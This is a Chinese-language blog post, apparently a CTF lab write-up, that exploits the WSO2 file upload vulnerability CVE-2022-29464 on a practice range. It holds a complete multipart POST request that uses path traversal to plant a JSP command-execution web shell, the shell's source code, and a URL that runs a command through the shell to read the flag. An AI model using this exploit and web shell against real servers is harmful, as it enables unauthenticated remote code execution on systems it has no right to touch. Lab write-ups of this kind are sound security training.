春秋云境：CVE-2022-29464

Acczdy

已于 2023-01-17 15:11:33 修改

阅读量1.4k

点赞数 1

分类专栏：春秋云境-靶场文章标签：安全系统安全安全漏洞 cve 网络安全

于 2022-11-29 20:47:28 首次发布

本文链接：https://blog.csdn.net/laobanjiull/article/details/128104379

版权

春秋云境-靶场专栏收录该内容

28 篇文章 21 订阅

订阅专栏

春秋云境：CVE-2022-29464

文章合集：春秋云境系列靶场记录（合集）

WSO2文件上传漏洞：CVE-2022-29464

在这里插入图片描述

漏洞介绍

WSO2文件上传漏洞（CVE-2022-29464）是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传，允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

解题步骤

访问URL，无需进行登录
通过网上传的POC进行文件上传

POST /fileupload/toolsAny HTTP/2
Host: eci-2ze6z6gdw8c133l2clup.cloudeci1.ichunqiu.com:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 896
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0


--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--

在这里插入图片描述

访问上传的文件并执行命令获取flag：https://eci-2ze6z6gdw8c133l2clup.cloudeci1.ichunqiu.com:9443/authenticationendpoint/test2.jsp?cmd=cat+%2Fflag

文章合集：春秋云境系列靶场记录（合集）

Acczdy

关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
春秋云境：CVE-2022-29464

WSO2文件上传漏洞（CVE-2022-29464）是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传，允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
复制链接

扫一扫